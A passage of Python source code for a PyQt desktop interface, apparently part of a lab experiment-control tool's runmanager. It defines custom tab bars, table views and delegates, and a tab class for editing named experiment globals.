if not self.tab_movable.get(index, self.isMovable()):
QtWidgets.QTabBar.setMovable(self, False) # disable dragging until they release the mouse
return QtWidgets.QTabBar.mousePressEvent(self, event)
def mouseReleaseEvent(self, event):
if self.isMovable():
# Restore this in case it was temporarily disabled by mousePressEvent
QtWidgets.QTabBar.setMovable(self, True)
return QtWidgets.QTabBar.mouseReleaseEvent(self, event)
def tabLayoutChange(self):
total_height = 0
for index in range(self.count()):
tabRect = self.tabRect(index)
total_height += tabRect.height()
if total_height > self.parent().height():
# Don't paint over the top of the scroll buttons:
scroll_buttons_area_height = 2*max(self.style().pixelMetric(QtWidgets.QStyle.PM_TabBarScrollButtonWidth),
qapplication.globalStrut().width())
self.paint_clip = self.width(), self.parent().height() - scroll_buttons_area_height
else:
self.paint_clip = None
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
if self.paint_clip is not None:
painter.setClipRect(0, 0, *self.paint_clip)
option = QtWidgets.QStyleOptionTab()
for index in range(self.count()):
tabRect = self.tabRect(index)
self.initStyleOption(option, index)
painter.drawControl(QtWidgets.QStyle.CE_TabBarTabShape, option)
if not self.tabIcon(index).isNull():
icon = self.tabIcon(index).pixmap(self.iconSize())
alignment = QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter
tabRect.moveLeft(10)
painter.drawItemPixmap(tabRect, alignment, icon)
tabRect.moveLeft(self.iconSize().width() + 15)
else:
tabRect.moveLeft(10)
painter.drawText(tabRect, QtCore.Qt.AlignVCenter, self.tabText(index))
if self.paint_clip is not None:
x_clip, y_clip = self.paint_clip
painter.setClipping(False)
palette = self.palette()
mid_color = palette.color(QtGui.QPalette.Mid)
painter.setPen(mid_color)
painter.drawLine(0, y_clip, x_clip, y_clip)
painter.end()
def tabSizeHint(self, index):
fontmetrics = QtGui.QFontMetrics(self.font())
text_width = fontmetrics.width(self.tabText(index))
text_height = fontmetrics.height()
height = text_height + 15
height = max(self.minheight, height)
width = text_width + 15
button = self.tabButton(index, QtWidgets.QTabBar.RightSide)
if button is not None:
height = max(height, button.height() + 7)
# Same amount of space around the button horizontally as it has vertically:
width += button.width() + height - button.height()
width = max(self.minwidth, width)
return QtCore.QSize(width, height)
def setTabButton(self, index, geometry, button):
if not isinstance(button, TabToolButton):
raise TypeError('Not a TabToolButton, won\'t paint correctly. Use a TabToolButton')
result = QtWidgets.QTabBar.setTabButton(self, index, geometry, button)
button.move(*button.get_correct_position())
return result
class TabToolButton(QtWidgets.QToolButton):
def __init__(self, *args, **kwargs):
QtWidgets.QToolButton.__init__(self, *args, **kwargs)
self.setFocusPolicy(QtCore.Qt.NoFocus)
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
paint_clip = self.parent().paint_clip
if paint_clip is not None:
point = QtCore.QPoint(*paint_clip)
global_point = self.parent().mapToGlobal(point)
local_point = self.mapFromGlobal(global_point)
painter.setClipRect(0, 0, local_point.x(), local_point.y())
option = QtWidgets.QStyleOptionToolButton()
self.initStyleOption(option)
painter.drawComplexControl(QtWidgets.QStyle.CC_ToolButton, option)
def get_correct_position(self):
parent = self.parent()
for index in range(parent.count()):
if parent.tabButton(index, QtWidgets.QTabBar.RightSide) is self:
break
else:
raise LookupError('Tab not found')
tabRect = parent.tabRect(index)
tab_x, tab_y, tab_width, tab_height = tabRect.x(), tabRect.y(), tabRect.width(), tabRect.height()
size = self.sizeHint()
width = size.width()
height = size.height()
padding = int((tab_height - height) / 2)
correct_x = tab_x + tab_width - width - padding
correct_y = tab_y + padding
return correct_x, correct_y
def moveEvent(self, event):
try:
correct_x, correct_y = self.get_correct_position()
except LookupError:
return # Things aren't initialised yet
if self.x() != correct_x or self.y() != correct_y:
# Move back! I shall not be moved!
self.move(correct_x, correct_y)
return QtWidgets.QToolButton.moveEvent(self, event)
class FingerTabWidget(QtWidgets.QTabWidget):
"""A QTabWidget equivalent which uses our FingerTabBarWidget"""
def __init__(self, parent, *args):
QtWidgets.QTabWidget.__init__(self, parent, *args)
self.setTabBar(FingerTabBarWidget(self))
def addTab(self, *args, **kwargs):
closeable = kwargs.pop('closable', False)
index = QtWidgets.QTabWidget.addTab(self, *args, **kwargs)
self.setTabClosable(index, closeable)
return index
def setTabClosable(self, index, closable):
right_button = self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide)
if closable:
if not right_button:
# Make one:
close_button = TabToolButton(self.parent())
close_button.setIcon(QtGui.QIcon(':/qtutils/fugue/cross'))
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, close_button)
close_button.clicked.connect(lambda: self._on_close_button_clicked(close_button))
else:
if right_button:
# Get rid of it:
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, None)
def _on_close_button_clicked(self, button):
for index in range(self.tabBar().count()):
if self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide) is button:
self.tabCloseRequested.emit(index)
break
class ItemView(object):
"""Mixin for QTableView and QTreeView that emits a custom signal leftClicked(index)
after a left click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Also has modified tab and arrow key behaviour and custom selection
highlighting."""
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
COLOR_HIGHLIGHT = "#40308CC6" # Semitransparent blue
def __init__(self, *args):
super(ItemView, self).__init__(*args)
self._pressed_index = None
self._double_click = False
self.setAutoScroll(False)
p = self.palette()
for group in [QtGui.QPalette.Active, QtGui.QPalette.Inactive]:
p.setColor(
group,
QtGui.QPalette.Highlight,
QtGui.QColor(self.COLOR_HIGHLIGHT))
p.setColor(
group,
QtGui.QPalette.HighlightedText,
p.color(QtGui.QPalette.Active, QtGui.QPalette.Foreground)
)
self.setPalette(p)
def mousePressEvent(self, event):
result = super(ItemView, self).mousePressEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = super(ItemView, self).leaveEvent(event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = super(ItemView, self).mouseDoubleClickEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = super(ItemView, self).mouseReleaseEvent(event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
def keyPressEvent(self, event):
if event.key() in [QtCore.Qt.Key_Space, QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
item = self.model().itemFromIndex(self.currentIndex())
if item.isEditable():
# Space/enter edits editable items:
self.edit(self.currentIndex())
else:
# Space/enter on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return super(ItemView, self).keyPressEvent(event)
def moveCursor(self, cursor_action, keyboard_modifiers):
current_index = self.currentIndex()
current_row, current_column = current_index.row(), current_index.column()
if cursor_action == QtWidgets.QAbstractItemView.MoveUp:
return current_index.sibling(current_row - 1, current_column)
elif cursor_action == QtWidgets.QAbstractItemView.MoveDown:
return current_index.sibling(current_row + 1, current_column)
elif cursor_action == QtWidgets.QAbstractItemView.MoveLeft:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QAbstractItemView.MoveRight:
return current_index.sibling(current_row, current_column + 1)
elif cursor_action == QtWidgets.QAbstractItemView.MovePrevious:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QAbstractItemView.MoveNext:
return current_index.sibling(current_row, current_column + 1)
else:
return super(ItemView, self).moveCursor(cursor_action, keyboard_modifiers)
class TreeView(ItemView, QtWidgets.QTreeView):
"""Treeview version of our customised ItemView"""
def __init__(self, parent=None):
super(TreeView, self).__init__(parent)
# Set columns to their minimum size, disabling resizing. Caller may still
# configure a specific section to stretch:
self.header().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.setItemDelegate(ItemDelegate(self))
class TableView(ItemView, QtWidgets.QTableView):
"""TableView version of our customised ItemView"""
def __init__(self, parent=None):
super(TableView, self).__init__(parent)
# Set rows and columns to the minimum size, disabling interactive resizing.
# Caller may still configure a specific column to stretch:
self.verticalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.horizontalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.ResizeToContents
)
self.horizontalHeader().sectionResized.connect(self.on_column_resized)
self.setItemDelegate(ItemDelegate(self))
self.verticalHeader().hide()
self.setShowGrid(False)
self.horizontalHeader().setHighlightSections(False)
def on_column_resized(self, col):
for row in range(self.model().rowCount()):
self.resizeRowToContents(row)
class AlternatingColorModel(QtGui.QStandardItemModel):
def __init__(self, view):
QtGui.QStandardItemModel.__init__(self)
# How much darker in each channel is the alternate base color compared
# to the base color?
self.view = view
palette = view.palette()
self.normal_color = palette.color(QtGui.QPalette.Base)
self.alternate_color = palette.color(QtGui.QPalette.AlternateBase)
r, g, b, a = self.normal_color.getRgb()
alt_r, alt_g, alt_b, alt_a = self.alternate_color.getRgb()
self.delta_r = alt_r - r
self.delta_g = alt_g - g
self.delta_b = alt_b - b
self.delta_a = alt_a - a
# A cache, store brushes so we don't have to recalculate them. Is faster.
self.bg_brushes = {}
def get_bgbrush(self, normal_brush, alternate, selected):
"""Get cell colour as a function of its ordinary colour, whether it is on an odd
row, and whether it is selected."""
normal_rgb = normal_brush.color().getRgb() if normal_brush is not None else None
try:
return self.bg_brushes[normal_rgb, alternate, selected]
except KeyError:
pass
# Get the colour of the cell with alternate row shading:
if normal_rgb is None:
# No colour has been set. Use palette colours:
if alternate:
bg_color = self.alternate_color
else:
bg_color = self.normal_color
else:
bg_color = normal_brush.color()
if alternate:
# Modify alternate rows:
r, g, b, a = normal_rgb
alt_r = min(max(r + self.delta_r, 0), 255)
alt_g = min(max(g + self.delta_g, 0), 255)
alt_b = min(max(b + self.delta_b, 0), 255)
alt_a = min(max(a + self.delta_a, 0), 255)
bg_color = QtGui.QColor(alt_r, alt_g, alt_b, alt_a)
# If parent is a TableView, we handle selection highlighting as part of the
# background colours:
if selected and isinstance(self.view, QtWidgets.QTableView):
# Overlay highlight colour:
r_s, g_s, b_s, a_s = QtGui.QColor(ItemView.COLOR_HIGHLIGHT).getRgb()
r_0, g_0, b_0, a_0 = bg_color.getRgb()
rgb = composite_colors(r_0, g_0, b_0, a_0, r_s, g_s, b_s, a_s)
bg_color = QtGui.QColor(*rgb)
brush = QtGui.QBrush(bg_color)
self.bg_brushes[normal_rgb, alternate, selected] = brush
return brush
def data(self, index, role):
"""When background color data is being requested, returns modified colours for
every second row, according to the palette of the view. This has the effect of
making the alternate colours visible even when custom colors have been set - the
same shading will be applied to the custom colours. Only really looks sensible
when the normal and alternate colors are similar. Also applies selection
highlight colour (using ItemView.COLOR_HIGHLIGHT), similarly with alternate-row
shading, for the case of a QTableView."""
if role == QtCore.Qt.BackgroundRole:
normal_brush = QtGui.QStandardItemModel.data(self, index, QtCore.Qt.BackgroundRole)
selected = index in self.view.selectedIndexes()
alternate = index.row() % 2
return self.get_bgbrush(normal_brush, alternate, selected)
return QtGui.QStandardItemModel.data(self, index, role)
class Editor(QtWidgets.QTextEdit):
"""Popup editor with word wrapping and automatic resizing."""
def __init__(self, parent):
QtWidgets.QTextEdit.__init__(self, parent)
self.setWordWrapMode(QtGui.QTextOption.WordWrap)
self.setAcceptRichText(False)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textChanged.connect(self.update_size)
self.initial_height = None
def update_size(self):
if self.initial_height is not None:
# Temporarily shrink back to the initial height, just so that the document
# size below returns the preferred size rather than the current size.
# QTextDocument doesn't have a sizeHint of minimumSizeHint method, so this
# is the best we can do to get its minimum size.
self.setFixedHeight(self.initial_height)
preferred_height = self.document().size().toSize().height()
# Do not shrink smaller than the initial height:
if self.initial_height is not None and preferred_height >= self.initial_height:
self.setFixedHeight(preferred_height)
def resizeEvent(self, event):
result = QtWidgets.QTextEdit.resizeEvent(self, event)
# Record the initial height after it is first set:
if self.initial_height is None:
self.initial_height = self.height()
return result
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a larger row height and column width, faint grey vertical
lines between columns, and a custom editor for handling multi-line data"""
MIN_ROW_HEIGHT = 22
EXTRA_ROW_HEIGHT = 6
EXTRA_COL_WIDTH = 20
def __init__(self, *args, **kwargs):
QtWidgets.QStyledItemDelegate.__init__(self, *args, **kwargs)
self._pen = QtGui.QPen()
self._pen.setWidth(1)
self._pen.setColor(QtGui.QColor.fromRgb(128, 128, 128, 64))
def sizeHint(self, *args):
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
if size.height() <= self.MIN_ROW_HEIGHT:
height = self.MIN_ROW_HEIGHT
else:
# Esnure cells with multiple lines of text still have some padding:
height = size.height() + self.EXTRA_ROW_HEIGHT
return QtCore.QSize(size.width() + self.EXTRA_COL_WIDTH, height)
def paint(self, painter, option, index):
if isinstance(self.parent(), QtWidgets.QTableView):
# Disable rendering of selection highlight for TableViews, they handle
# it themselves with the background colour data:
option.state &= ~(QtWidgets.QStyle.State_Selected)
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
if index.column() > 0:
painter.setPen(self._pen)
painter.drawLine(option.rect.topLeft(), option.rect.bottomLeft())
def eventFilter(self, obj, event):
"""Filter events before they get to the editor, so that editing is ended when
the user presses tab, shift-tab or enter (which otherwise would not end editing
in a QTextEdit)."""
if event.type() == QtCore.QEvent.KeyPress:
if event.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
# Allow shift-enter
if not event.modifiers() & QtCore.Qt.ShiftModifier:
self.commitData.emit(obj)
self.closeEditor.emit(obj)
return True
elif event.key() == QtCore.Qt.Key_Tab:
self.commitData.emit(obj)
self.closeEditor.emit(obj, QtWidgets.QStyledItemDelegate.EditNextItem)
return True
elif event.key() == QtCore.Qt.Key_Backtab:
self.commitData.emit(obj)
self.closeEditor.emit(obj, QtWidgets.QStyledItemDelegate.EditPreviousItem)
return True
return QtWidgets.QStyledItemDelegate.eventFilter(self, obj, event)
def createEditor(self, parent, option, index):
return Editor(parent)
def setEditorData(self, editor, index):
editor.setPlainText(index.data())
font = index.data(QtCore.Qt.FontRole)
default_font = qapplication.font(self.parent())
if font is None:
font = default_font
font.setPointSize(default_font.pointSize())
editor.setFont(font)
font_height = QtGui.QFontMetrics(font).height()
padding = (self.MIN_ROW_HEIGHT - font_height) / 2 - 1
editor.document().setDocumentMargin(padding)
editor.selectAll()
def setModelData(self, editor, model, index):
model.setData(index, editor.toPlainText())
class GroupTab(object):
GLOBALS_COL_DELETE = 0
GLOBALS_COL_NAME = 1
GLOBALS_COL_VALUE = 2
GLOBALS_COL_UNITS = 3
GLOBALS_COL_EXPANSION = 4
GLOBALS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GLOBALS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 2
GLOBALS_ROLE_PREVIOUS_TEXT = QtCore.Qt.UserRole + 3
GLOBALS_ROLE_IS_BOOL = QtCore.Qt.UserRole + 4
COLOR_ERROR = '#F79494' # light red
COLOR_OK = '#A5F7C6' # light green
COLOR_BOOL_ON = '#63F731' # bright green
COLOR_BOOL_OFF = '#608060' # dark green
GLOBALS_DUMMY_ROW_TEXT = '<Click to add global>'
def __init__(self, tabWidget, globals_file, group_name):
self.tabWidget = tabWidget
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load('group.ui')
# Add the ui to the parent tabWidget:
self.tabWidget.addTab(self.ui, group_name, closable=True)
self.set_file_and_group_name(globals_file, group_name)
self.globals_model = AlternatingColorModel(view=self.ui.tableView_globals)
self.globals_model.setHorizontalHeaderLabels(['Delete', 'Name', 'Value', 'Units', 'Expansion'])
self.globals_model.setSortRole(self.GLOBALS_ROLE_SORT_DATA)
self.ui.tableView_globals.setModel(self.globals_model)
self.ui.tableView_globals.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self.ui.tableView_globals.setSelectionMode(QtWidgets.QTableView.ExtendedSelection)
self.ui.tableView_globals.setSortingEnabled(True)
# Make it so the user can just start typing on an item to edit:
self.ui.tableView_globals.setEditTriggers(QtWidgets.QTableView.AnyKeyPressed |
QtWidgets.QTableView.EditKeyPressed)
# Ensure the clickable region of the delete button doesn't extend forever:
self.ui.tableView_globals.horizontalHeader().setStretchLastSection(False)
# Stretch the value column to fill available space:
self.ui.tableView_globals.horizontalHeader().setSectionResizeMode(
self.GLOBALS_COL_VALUE, QtWidgets.QHeaderView.Stretch
)
# Setup stuff for a custom context menu:
self.ui.tableView_globals.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_globals_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected global(s)', self.ui)
self.action_globals_set_selected_true = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected Booleans True', self.ui)
self.action_globals_set_selected_false = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected Booleans False', self.ui)
self.connect_signals()
# Populate the model with globals from the h5 file:
self.populate_model()
# Set sensible column widths:
for col in range(self.globals_model.columnCount()):
if col != self.GLOBALS_COL_VALUE:
self.ui.tableView_globals.resizeColumnToContents(col)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_NAME) < 200:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_NAME, 200)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_VALUE) < 200:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_VALUE, 200)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_UNITS) < 100:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_UNITS, 100)
if self.ui.tableView_globals.columnWidth(self.GLOBALS_COL_EXPANSION) < 100:
self.ui.tableView_globals.setColumnWidth(self.GLOBALS_COL_EXPANSION, 100)
self.ui.tableView_globals.resizeColumnToContents(self.GLOBALS_COL_DELETE)
# Error state of tab
self.tab_contains_errors = False
def connect_signals(self):
self.ui.tableView_globals.leftClicked.connect(self.on_tableView_globals_leftClicked)
self.ui.tableView_globals.customContextMenuRequested.connect(self.on_tableView_globals_context_menu_requested)
self.action_globals_set_selected_true.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('True'))
self.action_globals_set_selected_false.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('False'))
self.action_globals_delete_selected.triggered.connect(self.on_globals_delete_selected_triggered)
self.globals_model.itemChanged.connect(self.on_globals_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.globals_model_item_changed_disconnected = DisconnectContextManager(
self.globals_model.itemChanged, self.on_globals_model_item_changed)
def set_file_and_group_name(self, globals_file, group_name):
"""Provided as a separate method so the main app can call it if the
group gets renamed"""
self.globals_file = globals_file
self.group_name = group_name
self.ui.label_globals_file.setText(globals_file)
self.ui.label_group_name.setText(group_name)
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.setTabText(index, group_name)
self.tabWidget.setTabToolTip(index, '%s\n(%s)' % (group_name, globals_file))
def set_tab_icon(self, icon_string):
index = self.tabWidget.indexOf(self.ui)
if icon_string is not None:
icon = QtGui.QIcon(icon_string)
else:
icon = QtGui.QIcon()
if self.tabWidget.tabIcon(index).cacheKey() != icon.cacheKey():
logger.info('setting tab icon')
self.tabWidget.setTabIcon(index, icon)
def populate_model(self):
globals = runmanager.get_globals({self.group_name: self.globals_file})[self.group_name]
for name, (value, units, expansion) in globals.items():
row = self.make_global_row(name, value, units, expansion)
self.globals_model.appendRow(row)
value_item = row[self.GLOBALS_COL_VALUE]
self.check_for_boolean_values(value_item)
expansion_item = row[self.GLOBALS_COL_EXPANSION]
self.on_globals_model_expansion_changed(expansion_item)
# Add the dummy item at the end:
dummy_delete_item = QtGui.QStandardItem()
# This lets later code know that this row does not correspond to an
# actual global:
dummy_delete_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item.setToolTip('Click to add global')
dummy_name_item = QtGui.QStandardItem(self.GLOBALS_DUMMY_ROW_TEXT)
dummy_name_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
dummy_name_item.setToolTip('Click to add global')
dummy_name_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GLOBALS_DUMMY_ROW_TEXT, self.GLOBALS_ROLE_PREVIOUS_TEXT)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_value_item = QtGui.QStandardItem()
dummy_value_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_value_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_value_item.setToolTip('Click to add global')
dummy_units_item = QtGui.QStandardItem()
dummy_units_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_units_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_units_item.setToolTip('Click to add global')
dummy_expansion_item = QtGui.QStandardItem()
dummy_expansion_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_expansion_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_expansion_item.setToolTip('Click to add global')
self.globals_model.appendRow(
[dummy_delete_item, dummy_name_item, dummy_value_item, dummy_units_item, dummy_expansion_item])
# Sort by name:
self.ui.tableView_globals.sortByColumn(self.GLOBALS_COL_NAME, QtCore.Qt.AscendingOrder)
def make_global_row(self, name, value='', units='', expansion=''):
logger.debug('%s:%s - make global row: %s ' % (self.globals_file, self.group_name, name))
# We just set some data here, other stuff is set in
# self.update_parse_indication after runmanager has a chance to parse
# everything and get back to us about what that data should be.
delete_item = QtGui.QStandardItem()
delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
delete_item.setData(False, self.GLOBALS_ROLE_SORT_DATA)
delete_item.setEditable(False)
delete_item.setToolTip('Delete global from group.')
name_item = QtGui.QStandardItem(name)
name_item.setData(name, self.GLOBALS_ROLE_SORT_DATA)
name_item.setData(name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_item.setToolTip(name)
name_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
value_item = QtGui.QStandardItem(value)
value_item.setData(value, self.GLOBALS_ROLE_SORT_DATA)
value_item.setData(str(value), self.GLOBALS_ROLE_PREVIOUS_TEXT)
value_item.setToolTip('Evaluating...')
value_item.setFont(QtGui.QFont(GLOBAL_MONOSPACE_FONT))
units_item = QtGui.QStandardItem(units)
units_item.setData(units, self.GLOBALS_ROLE_SORT_DATA)
units_item.setData(units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setToolTip('')
expansion_item = QtGui.QStandardItem(expansion)
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
expansion_item.setToolTip('')
row = [delete_item, name_item, value_item, units_item, expansion_item]
return row
def on_tableView_globals_leftClicked(self, index):
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.globals_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new global' row. Enter editing mode on
# the name item so they can enter a name for the new global:
self.ui.tableView_globals.setCurrentIndex(name_index)
self.ui.tableView_globals.edit(name_index)
elif item.data(self.GLOBALS_ROLE_IS_BOOL):
# It's a bool indicator. Toggle it
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
value_item.setText('False')
elif value_item.text() == 'False':
value_item.setText('True')
else:
raise AssertionError('expected boolean value')
elif item.column() == self.GLOBALS_COL_DELETE:
# They clicked a delete button.
self.delete_global(global_name)
elif not item.data(self.GLOBALS_ROLE_IS_BOOL):
# Edit whatever it is:
if (self.ui.tableView_globals.currentIndex() != index
or self.ui.tableView_globals.state() != QtWidgets.QTreeView.EditingState):
self.ui.tableView_globals.setCurrentIndex(index)
self.ui.tableView_globals.edit(index)
def on_globals_model_item_changed(self, item):
if item.column() == self.GLOBALS_COL_NAME:
self.on_globals_model_name_changed(item)
elif item.column() == self.GLOBALS_COL_VALUE:
self.on_globals_model_value_changed(item)
elif item.column() == self.GLOBALS_COL_UNITS:
self.on_globals_model_units_changed(item)
elif item.column() == self.GLOBALS_COL_EXPANSION:
self.on_globals_model_expansion_changed(item)
def on_globals_model_name_changed(self, item):
"""Handles global renaming and creation of new globals due to the user
editing the <click to add global> item"""
item_text = item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
if item_text != self.GLOBALS_DUMMY_ROW_TEXT:
# The user has made a new global by editing the <click to add
# global> item
global_name = item_text
self.new_global(global_name)
else:
# User has renamed a global.
new_global_name = item_text
previous_global_name = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
# Ensure the name actually changed, rather than something else
# about the item:
if new_global_name != previous_global_name:
self.rename_global(previous_global_name, new_global_name)
def on_globals_model_value_changed(self, item):
index = item.index()
new_value = item.text()
previous_value = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Ensure the value actually changed, rather than something else about
# the item:
if new_value != previous_value:
self.change_global_value(global_name, previous_value, new_value)
def on_globals_model_units_changed(self, item):
index = item.index()
new_units = item.text()
previous_units = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# If it's a boolean value, ensure the check state matches the bool state:
if item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
item.setCheckState(QtCore.Qt.Checked)
elif value_item.text() == 'False':
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('expected boolean value')
# Ensure the value actually changed, rather than something else about
# the item:
if new_units != previous_units:
self.change_global_units(global_name, previous_units, new_units)
def on_globals_model_expansion_changed(self, item):
index = item.index()
new_expansion = item.text()
previous_expansion = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Don't want icon changing to recurse - which happens even if it is
# the same icon. So disconnect the signal temporarily:
with self.globals_model_item_changed_disconnected:
if new_expansion == 'outer':
item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be outer producted with other lists to form a larger parameter space.')
elif new_expansion:
item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be iterated over in lock-step with other globals in the ' +
'\'%s\' zip group.' % new_expansion)
else:
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('This global will be interpreted as a single value and passed to compilation as-is.')
# Ensure the value actually changed, rather than something else about
# the item:
if new_expansion != previous_expansion:
self.change_global_expansion(global_name, previous_expansion, new_expansion)
def on_tableView_globals_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_globals_set_selected_true)
menu.addAction(self.action_globals_set_selected_false)
menu.addAction(self.action_globals_delete_selected)
menu.exec_(QtGui.QCursor.pos())
def on_globals_delete_selected_triggered(self):
selected_indexes = self.ui.tableView_globals.selectedIndexes()
selected_items = (self.globals_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_NAME]
# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_global so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d globals?" % len(name_items)):
return
for item in name_items:
global_name = item.text()
self.delete_global(global_name, confirm=not confirm_multiple)
def on_globals_set_selected_bools_triggered(self, state):
selected_indexes = self.ui.tableView_globals.selectedIndexes()
selected_items = [self.globals_model.itemFromIndex(index) for index in selected_indexes]
value_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_VALUE]
units_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_UNITS]
for value_item, units_item in zip(value_items, units_items):
if units_item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item.setText(state)
def close(self):
# It is up to the main runmanager class to drop references to this
# instance before or after calling this method, so that after the
# tabWidget no longer owns our widgets, both the widgets and the
# instance will be garbage collected.
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.removeTab(index)
def get_global_item_by_name(self, global_name, column, previous_name=None):
"""Returns an item from the row representing a global in the globals model.
Which item is returned is set by the column argument."""
possible_name_items = self.globals_model.findItems(global_name, column=self.GLOBALS_COL_NAME)
if previous_name is not None:
# Filter by previous name, useful for telling rows apart when a
# rename is in progress and two rows may temporarily contain the
